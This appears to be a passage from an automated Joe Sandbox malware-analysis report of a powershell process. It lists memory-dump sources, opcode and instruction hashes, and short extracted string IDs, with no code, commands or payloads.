                                                                                        • Instruction ID: f7fb4600155c845e073c69ec16129a785ec34a3f1e4f4533a0a3f24e98614c51
                                                                                        • Opcode Fuzzy Hash: 17e574829ef471490ea23fa28cc58235af4bea4159b66f35c55902bf7914c4aa
                                                                                        • Instruction Fuzzy Hash: FED06774A14209CF8B54EFA4E4569BEBBB6FB44215F1041ADEA0993391EB306C91CBC1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 294a8c16fce44f3fd419e41a5c619b26f92d9370b63d8ccd46458a49034bad37
                                                                                        • Instruction ID: e6c2b596c8e1b322d85a989f91c1520343465813fdc664a7d488c71ef7c98269
                                                                                        • Opcode Fuzzy Hash: 294a8c16fce44f3fd419e41a5c619b26f92d9370b63d8ccd46458a49034bad37
                                                                                        • Instruction Fuzzy Hash: CEA011B820A0008BC200CA00C882800B320AB82208B28C088EA088F28ACBA3E8038A80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$XRcq$XRcq$XRcq$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-2758755434
                                                                                        • Opcode ID: 5142c9cf4239d8ae8eb80ab299d01887a00d27464db458633a300ea6c7da1e72
                                                                                        • Instruction ID: 91c01d3a20f0534ac07a54d26c112873ef1afef042b7e34b12d43c10e6cdf2b5
                                                                                        • Opcode Fuzzy Hash: 5142c9cf4239d8ae8eb80ab299d01887a00d27464db458633a300ea6c7da1e72
                                                                                        • Instruction Fuzzy Hash: 5302F771B2420BDFCB149F68CB44A6B7BE2AF89310F14C469E8119F295CB71DD86C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                                                        • API String ID: 0-459999756
                                                                                        • Opcode ID: 2d572c2afd952a80a1e4a40796eed3919f12e962df8706cfc406b7ba8766cbd8
                                                                                        • Instruction ID: e6dc4f79e65edcfc6d9bb23145bee6212d849187a4f4ab5d4de72583146d971b
                                                                                        • Opcode Fuzzy Hash: 2d572c2afd952a80a1e4a40796eed3919f12e962df8706cfc406b7ba8766cbd8
                                                                                        • Instruction Fuzzy Hash: 09B10B75B2411ADFCB24DF68CB04B6BBBE2AF89311F158469E8019B394CB71DC46C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-335829853
                                                                                        • Opcode ID: d2c172eb6565d7b1d13b8a446ab89e8c925e238ad48d1c8a54987aab1602ba94
                                                                                        • Instruction ID: 90a7567f22d7bfabc01b2b5bd40539ac46124969b3449fd328ae6e9494ee2ad1
                                                                                        • Opcode Fuzzy Hash: d2c172eb6565d7b1d13b8a446ab89e8c925e238ad48d1c8a54987aab1602ba94
                                                                                        • Instruction Fuzzy Hash: 278107B1F2020BDFCB248E19C64466B77A6AF85711F1A88E9E8019F394DB71DC85C7B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-2740984363
                                                                                        • Opcode ID: 34771be6f41a85c25e862e0250801cda48b6e51ad96a2aad7be546226a0f1c2b
                                                                                        • Instruction ID: 670b983c363ee86f6bd68c9526cd7ac8154e5804b75cc2844e68c1f46f385630
                                                                                        • Opcode Fuzzy Hash: 34771be6f41a85c25e862e0250801cda48b6e51ad96a2aad7be546226a0f1c2b
                                                                                        • Instruction Fuzzy Hash: 38C16BB17243178FD7248A689E01BAABBE6EFC6710F14847AE515CF391DB32C845C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                        • API String ID: 0-202320237
                                                                                        • Opcode ID: 2432b208e179e2d982129fd84417a5a0179fd8bb383c60c48abe876b5c5cea5b
                                                                                        • Instruction ID: b835dc3e69c18e14c96d3617daa6e0c8eaff259ea80724c2bf975b2d23270e84
                                                                                        • Opcode Fuzzy Hash: 2432b208e179e2d982129fd84417a5a0179fd8bb383c60c48abe876b5c5cea5b
                                                                                        • Instruction Fuzzy Hash: BB71F9B1F2021ADFDB249F29C604A6ABBE2AF88310F1584A9E8059F354DB71DD45C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3732357466
                                                                                        • Opcode ID: 1f09c8616356973f681facce6e81317d0c3c7cb206c84353b2fff399202d2ff2
                                                                                        • Instruction ID: 59c3c113c56ab66740822654501eb1261dbc67cb39afde532c085182755474dd
                                                                                        • Opcode Fuzzy Hash: 1f09c8616356973f681facce6e81317d0c3c7cb206c84353b2fff399202d2ff2
                                                                                        • Instruction Fuzzy Hash: 86A129F1B2420B8FCB249A6D8A44A6FBBF6AF85224F14C47AD505CF355DB32C845C791
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q
                                                                                        • API String ID: 0-1270759279
                                                                                        • Opcode ID: ddc25c2305e81111533bc7e18f69a85ebc93b566f7b96bbdf06c47965b95985f
                                                                                        • Instruction ID: bece9a97cb915ad3910ffc63a609fd4f136a3a5af05b678bd0c7c047bf05dca2
                                                                                        • Opcode Fuzzy Hash: ddc25c2305e81111533bc7e18f69a85ebc93b566f7b96bbdf06c47965b95985f
                                                                                        • Instruction Fuzzy Hash: 52C15BB1B2530BCFDB258B798A0176ABBA6AFC6310F1484BAD405CF351DB71C985C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-1608119003
                                                                                        • Opcode ID: dde305afb23a3cd00e6e5c32d789a3de81172c656d807f891e57aef88e426ae4
                                                                                        • Instruction ID: 127dec66fdc39bac0694ba32b0a7715a165f9395de516a062b2ac07b2e7ee81d
                                                                                        • Opcode Fuzzy Hash: dde305afb23a3cd00e6e5c32d789a3de81172c656d807f891e57aef88e426ae4
                                                                                        • Instruction Fuzzy Hash: 077139B27243178FD7258B69CA0866ABBF2EFC6711F14846BD405CF3A1DA32C845C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                        • API String ID: 0-1710924510
                                                                                        • Opcode ID: d1ed618f9d09ba0e3d472e68ad09d25177e63aa031f74133a438b2245f39ae3a
                                                                                        • Instruction ID: b7c8a7bcd6077b794483c88fae9525206b4d2df20b886918cc4378b2e6a4f0ac
                                                                                        • Opcode Fuzzy Hash: d1ed618f9d09ba0e3d472e68ad09d25177e63aa031f74133a438b2245f39ae3a
                                                                                        • Instruction Fuzzy Hash: ED71F8B5A28206DFCB24CE54C744B6AB7F2EF45311F19849AEC04AB394C771DD86CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-2461640029
                                                                                        • Opcode ID: d8f5459b38f25d8f4ed6d78f7e3ab16399c6a63f0aceba5c1b04116f54c10031
                                                                                        • Instruction ID: ed3e099502d4a0240877f9f7ed0d62015aca62e611d7e0c20f0bb1c804d5df55
                                                                                        • Opcode Fuzzy Hash: d8f5459b38f25d8f4ed6d78f7e3ab16399c6a63f0aceba5c1b04116f54c10031
                                                                                        • Instruction Fuzzy Hash: A751A3B5E30207DFDB288E05C74476677A5AF45711F1A88EAE8149F2A0C771DD84CBB1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-2461640029
                                                                                        • Opcode ID: 0841abe85d5dc164b90f8f11944c9457e4309eb6720171904540e8ed021581b3
                                                                                        • Instruction ID: 04dc9fa118a9aed36e3d3845b43406a088e32817bde79621f6fa6e68f4847e56
                                                                                        • Opcode Fuzzy Hash: 0841abe85d5dc164b90f8f11944c9457e4309eb6720171904540e8ed021581b3
                                                                                        • Instruction Fuzzy Hash: A851A0F0E30207DFDB288E05C74476677A6AF45721F5A88EAE8158F2A0C771D884CBB1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3669853574
                                                                                        • Opcode ID: 79e050366ccad6931a0dcf3aa6a3996276d2b25853293793a82af06923fc6a14
                                                                                        • Instruction ID: 583a1a9affb1ef8a047af7be75bf34c6bfac3dc010e71a6d42517d42d91117b6
                                                                                        • Opcode Fuzzy Hash: 79e050366ccad6931a0dcf3aa6a3996276d2b25853293793a82af06923fc6a14
                                                                                        • Instruction Fuzzy Hash: D66148B272420BCFCB299E29C6446AABBF2AF85321F14C47AD409CF255DB31CC45C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                                                                        • API String ID: 0-2098638132
                                                                                        • Opcode ID: 558002e91609e53a6dddf2d5880eab16e5de5b32eda8419c6c51529df32f1c02
                                                                                        • Instruction ID: b5c863a21b78b49c8d8cab8558e00be498194cbaffea7ca6713593b266def756
                                                                                        • Opcode Fuzzy Hash: 558002e91609e53a6dddf2d5880eab16e5de5b32eda8419c6c51529df32f1c02
                                                                                        • Instruction Fuzzy Hash: D051F5F1E24246DFCB24CE14C644B6ABBE2AF45350F1A84E9E8059F2A1DB71DD44CB71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3272787073
                                                                                        • Opcode ID: 88ff5da66a91d110a11990e5646be49992e1cddfbd4886896aaca2a9dd8a19f2
                                                                                        • Instruction ID: 9cd9087c85074c8cf795c6f8f0c0c73be7eb13e9e5735765a25f4c56966293b4
                                                                                        • Opcode Fuzzy Hash: 88ff5da66a91d110a11990e5646be49992e1cddfbd4886896aaca2a9dd8a19f2
                                                                                        • Instruction Fuzzy Hash: C2716BF0B2420BDFDB249E68DA446AAB7E2EF85310F24C479D8058F354DB32D945CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3272787073
                                                                                        • Opcode ID: 4b408828a755cc1f4192b476984b57237f006d37e5f58cd7835dcafdd3a080f0
                                                                                        • Instruction ID: 496d1edf1594f044997279058aac09ce95493101e86250f4d8920c90e483c319
                                                                                        • Opcode Fuzzy Hash: 4b408828a755cc1f4192b476984b57237f006d37e5f58cd7835dcafdd3a080f0
                                                                                        • Instruction Fuzzy Hash: A14107B1F2431BCFCB248A698A5067BBBE5BF85210F2585FAD406C7245DA31C945C7B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3272787073
                                                                                        • Opcode ID: e56ab03015e5fb49871ae95b4ed319ef0f66876841df09ba5a3d6c4d51073337
                                                                                        • Instruction ID: a3ce97022c92ead2da2304ad54702463240b865212858664d2785b585709cd27
                                                                                        • Opcode Fuzzy Hash: e56ab03015e5fb49871ae95b4ed319ef0f66876841df09ba5a3d6c4d51073337
                                                                                        • Instruction Fuzzy Hash: 0A41D6F4B3020BDFDB349E25CA206BA7BA6AFC5210F54846ED5058B251DF32D989CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-3997570045
                                                                                        • Opcode ID: 8c6d697de8e7becf44be1118b310aea9a30474213bbcde4869e4938f81dba149
                                                                                        • Instruction ID: c865b8beb0646db5ac9ced7e7d2c466232044e2724e2fda88ab307a598eabefe
                                                                                        • Opcode Fuzzy Hash: 8c6d697de8e7becf44be1118b310aea9a30474213bbcde4869e4938f81dba149
                                                                                        • Instruction Fuzzy Hash: AF31A2B1A30207DFDB288E1DC744BAEB7F2AB95730F14C06AE8155B290CB71D985CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                        • API String ID: 0-3846404929
                                                                                        • Opcode ID: cc390dc3d05219e61b7dafe17f93243c72edd6db4682f36f82a7f6138372d828
                                                                                        • Instruction ID: 525629ccd795a7310040a61b7945ca7bf4de3a02913cf7380c6afac327b6e2af
                                                                                        • Opcode Fuzzy Hash: cc390dc3d05219e61b7dafe17f93243c72edd6db4682f36f82a7f6138372d828
                                                                                        • Instruction Fuzzy Hash: B631E4B1F20219DFCB24CF58C640A5ABBA2BF88710F168599E805AF360C771DD41CBA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-324510305
                                                                                        • Opcode ID: 1a4f3123d2b19ff3cc8adf90d4712fbd1cc665c8ae5b8dd3ee88403c476611f0
                                                                                        • Instruction ID: ac8e4c55333b18f73bdb16b33bd5d54738a19c0e1233a4e582c8f0c4eda56940
                                                                                        • Opcode Fuzzy Hash: 1a4f3123d2b19ff3cc8adf90d4712fbd1cc665c8ae5b8dd3ee88403c476611f0
                                                                                        • Instruction Fuzzy Hash: 8221E532A08F15EFCB249E64C944A69B7F4EF4071AF2441AEEC049F251E731D906CF61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-324510305
                                                                                        • Opcode ID: 418318e23e8f5cf10d49c94f0f30bda19e38f969bdefe27a209b4a855b638f75
                                                                                        • Instruction ID: a2978cd4cee7834b2856bb9586701ff8f52afb7956e6d733cf80292cc606ad84
                                                                                        • Opcode Fuzzy Hash: 418318e23e8f5cf10d49c94f0f30bda19e38f969bdefe27a209b4a855b638f75
                                                                                        • Instruction Fuzzy Hash: B421D332A08F19EFCB24AE54C944A69B7F4EF40A1AF1440AEEC049F251E731D906CB61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$tP^q$(dq$(dq$(dq
                                                                                        • API String ID: 0-4083485116
                                                                                        • Opcode ID: e289dfdc9bf155a1618700f1f22f5b67442ac258561a6826eff135f4f512660f
                                                                                        • Instruction ID: c49d1ea976271be116a4b4b6ffa42f46f3dd35bc7e6df1b54e7d296dc5ade096
                                                                                        • Opcode Fuzzy Hash: e289dfdc9bf155a1618700f1f22f5b67442ac258561a6826eff135f4f512660f
                                                                                        • Instruction Fuzzy Hash: 082125B1B68206EFCB24CE58DB00B6B77A2AF89710F258459EC04AB394C671DC43CBD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-1420252700
                                                                                        • Opcode ID: f4ea03527e0a7adc23126b2d17fbbcd60779f16bd09ec001eb0b34aa197dfc28
                                                                                        • Instruction ID: c2d34b612c09d9920f6bff34da9e9c219116e2ca31dc44298a798f6636028416
                                                                                        • Opcode Fuzzy Hash: f4ea03527e0a7adc23126b2d17fbbcd60779f16bd09ec001eb0b34aa197dfc28
                                                                                        • Instruction Fuzzy Hash: 2E126BB4A002199FCB15DB24CD81B9EBBB2BB89304F5085E8D9096B755CB72EDC5CF90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-1420252700
                                                                                        • Opcode ID: bb048ed4bb0b53077e82b9e6e5b431dbfb67578f49a131e7e17893a631b860ed
                                                                                        • Instruction ID: cd97294ea3f5763c32f86a237336a57db629bf0f42fe2bde322a6a66af4f825e
                                                                                        • Opcode Fuzzy Hash: bb048ed4bb0b53077e82b9e6e5b431dbfb67578f49a131e7e17893a631b860ed
                                                                                        • Instruction Fuzzy Hash: 91D12CB1B2430ACFCB149B78D6496AABBE2AFCA310F14846AD505CF355DB32DC45C762
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q$tP^q$tP^q$tP^q
                                                                                        • API String ID: 0-91886675
                                                                                        • Opcode ID: 5d25766b4a20417eef7c0368b59b316503bd4ca852320f9e3f865d815e5775af
                                                                                        • Instruction ID: 7360cdf0e8810c6dab0acecb4ed3c896cb85d17266bfb254ac030e88bc38b94b
                                                                                        • Opcode Fuzzy Hash: 5d25766b4a20417eef7c0368b59b316503bd4ca852320f9e3f865d815e5775af
                                                                                        • Instruction Fuzzy Hash: 78C18035B00309EFCB149F58D544A6ABBE2FB88711F1488A9E9159B352FB31DC46CBD2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q$tP^q$tP^q$tP^q
                                                                                        • API String ID: 0-91886675
                                                                                        • Opcode ID: d88452468870cbc58b2efa8c5fb8723e4162c92cbf9ea9c2e584e08ffcf00045
                                                                                        • Instruction ID: cc776a932fd875e4cceaf4fdeaf51095e10afafe8f79cd780706b7bf1923b128
                                                                                        • Opcode Fuzzy Hash: d88452468870cbc58b2efa8c5fb8723e4162c92cbf9ea9c2e584e08ffcf00045
                                                                                        • Instruction Fuzzy Hash: 2DA1A331B40318EFCB149F6CC544A6EFBE6EBC8711F1488A9E8159B355EA32DC46CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                        • API String ID: 0-3859475322
                                                                                        • Opcode ID: 664f355c2c567ef32c1c66dfbd8e00a41e1eb97ed46c2db7d4639b01ecdcc71f
                                                                                        • Instruction ID: 6a273902b191c72796137901cf6564d9e52e6ba6e9327cba50942c2a551111e1
                                                                                        • Opcode Fuzzy Hash: 664f355c2c567ef32c1c66dfbd8e00a41e1eb97ed46c2db7d4639b01ecdcc71f
                                                                                        • Instruction Fuzzy Hash: 0F819CB1B20287DFDB24DA799A0476BBBE2AFC5310F14846AD411CB292DF71CC45D7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                        • API String ID: 0-3859475322
                                                                                        • Opcode ID: a7127926222c7c9dd0e99b90de17bf06805e7f1daa690fa9eda59e23e132c694
                                                                                        • Instruction ID: 075d667b3cfcc3cbce4dd95d0c408dbdf58ee70faf7d5d2518e7a34e56ed4542
                                                                                        • Opcode Fuzzy Hash: a7127926222c7c9dd0e99b90de17bf06805e7f1daa690fa9eda59e23e132c694
                                                                                        • Instruction Fuzzy Hash: B1716AB17243468FC7248A68890177BBBA6EFC6310F18C87BD545CB751DA32D885C791
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                        • API String ID: 0-3859475322
                                                                                        • Opcode ID: 24edfce9f838e4eb4d8a98d5ff270deea25e044ad36b71d8a46b9f71a7d9103d
                                                                                        • Instruction ID: 119830c98f464cef1dcf3877bf260c8aaf46cc990572b05ce007ee1fc02ac5d2
                                                                                        • Opcode Fuzzy Hash: 24edfce9f838e4eb4d8a98d5ff270deea25e044ad36b71d8a46b9f71a7d9103d
                                                                                        • Instruction Fuzzy Hash: 997168B1B2030B8FCB249B689A067AABFB2AFC5310F14C47AD505CB355DB71C885C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                        • API String ID: 0-1420252700
                                                                                        • Opcode ID: 3a11adb79efdcd9b739efab26887d7fff473468ca20330f071b17ff909bbe2d3
                                                                                        • Instruction ID: d356eb269966f9e56040bf3aff7a62cf00373fdffeb5700234c57d798511ec7f
                                                                                        • Opcode Fuzzy Hash: 3a11adb79efdcd9b739efab26887d7fff473468ca20330f071b17ff909bbe2d3
                                                                                        • Instruction Fuzzy Hash: C061F5F6B2420BCFCB248E6D86156ABBBE1AFC6211F1484BFD405CB215DB31C985CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_7270000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                        • API String ID: 0-2125118731
